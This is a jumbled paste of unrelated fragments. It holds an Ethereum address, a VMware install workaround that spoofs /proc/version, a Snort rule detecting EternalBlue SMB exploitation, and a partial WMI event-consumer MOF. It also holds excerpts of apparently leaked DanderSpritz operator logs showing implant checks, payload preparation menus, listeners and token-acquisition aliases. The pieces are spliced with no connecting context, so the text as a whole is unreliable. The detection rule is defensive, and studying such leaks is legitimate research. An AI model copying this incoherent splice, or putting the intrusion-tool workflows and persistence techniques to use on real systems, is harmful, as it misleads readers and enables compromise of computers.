0xce49849306Ba415b5b7DB7fF3c850241c69bc0e7
before installation (as root; the spoofed gcc version string makes the VMware installer's kernel-module build accept the running compiler):
# sed 's/gcc version 7/gcc version 6/' /proc/version > /tmp/version
# mount --bind /tmp/version /proc/version
now install / reinstall ..., then restore /proc/version:
# umount /proc/version && rm /tmp/version
# cp -r /usr/lib/vmware-installer/2.1.0/lib/lib/libexpat.so.0 /usr/lib/vmware/lib
alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"OS-WINDOWS Microsoft Windows SMB remote code execution attempt"; flow:to_server,established; content:"|FF|SMB3|00 00 00 00|"; depth:9; offset:4; byte_extract:2,26,TotalDataCount,relative,little; byte_test:2,>,TotalDataCount,20,relative,little; metadata:policy balanced-ips drop, policy connectivity-ips drop, policy security-ips drop, ruleset community, service netbios-ssn; reference:cve,2017-0144; reference:cve,2017-0146; reference:url,isc.sans.edu/forums/diary/ETERNALBLUE+Possible+Window+SMB+Buffer+Overflow+0Day/22304/; reference:url,technet.microsoft.com/en-us/security/bulletin/MS17-010; classtype:attempted-admin; sid:41978; rev:3;)
#pragma namespace ("\\\\.\\Root\\cimv2")
class MSClassConsumer71
{
[key] string Name;
};
class ActiveScriptEventConsumer : __EventConsumer
{
[key] string Name;
@misterch0c
misterch0c / gist:2419bc9507cf13ec06695cb874907a07
Created April 19, 2017 19:26
DFReport_00544-GetFile_all_2017_04_19_19h11m54s.191.get
ImplantIndependent:
Special:
StraitBizarre:
UnitedRake:
UR ToggleFA Return Code: 0x6
FlewAvenue:
Legacy:
KillSuit:
CritterFrenzy:
DiveBar:
Enter menu option: [0]
3
Running command 'registryquery -hive l -key "Software\Classes\CLSID\{091FD378-422D-A36E-8487-83B57ADD2109}\TypeLib"'
Failed to open registry key
The system cannot find the file specified.
*** Command indicated failure ***
- Special registry key NOT present.
Continue?
CONTINUE
01:06:52>> pc_prep -sharedlib
[01:06:52] ID: 2744 'python' started [target: z0.0.0.20]
- Possible payloads:
- 0) - Quit
- 1) - Standard TCP (i386-winnt Level3 sharedlib)
- 2) - HTTP Proxy (i386-winnt Level3 sharedlib)
- 3) - Standard TCP (x64-winnt Level3 sharedlib)
- 4) - HTTP Proxy (x64-winnt Level3 sharedlib)
- 5) - Standard TCP Generic (i386-winnt Level4 sharedlib)
- 6) - HTTP Proxy Generic (i386-winnt Level4 sharedlib)
archive file header
magicNumber: 0x12345678
read/write stats:
pos_write_pointer: 0x0000014c
pos_read_pointer: 0x00000120
wrap_count: 0x00000000
num_health_events: 0x00000000
last_data_block_key: 0x00000840
file_time_stamp: 07/14/2009 01:20:36
[22:59:16] ID: 1125 'pc_listen' started [target: z0.0.0.1]
Waiting for connection...
Setting Sockopt
Listening on [0.0.0.0]:443.
Setting Sockopt
Listening on [0.0.0.0]:80.
Setting Sockopt
Listening on [0.0.0.0]:53.
Setting Sockopt
Listening on [0.0.0.0]:1509.
21:25:59>> aliases
[21:25:59] ID: 331 'aliases' started [target: z0.0.0.1]
acquiretoken : LOCAL : script _AcquireToken.dss %%cmd_args%%
acquiretoken : ANY_REMOTE : script _AcquireToken.dss %%cmd_args%%
arparp : LOCAL : python windows/arparp.py -args " %%cmd_args%% " -project Ops
arparp : ANY_REMOTE : python windows/arparp.py -args " %%cmd_args%% " -project Ops
channels : LOCAL : commands %%cmd_args%%
channels : ANY_REMOTE : commands %%cmd_args%%
checkpsp : LOCAL : python windows/checkpsp.py -args " %%cmd_args%% " -project Ops
checkpsp : ANY_REMOTE : python windows/checkpsp.py -args " %%cmd_args%% " -project Ops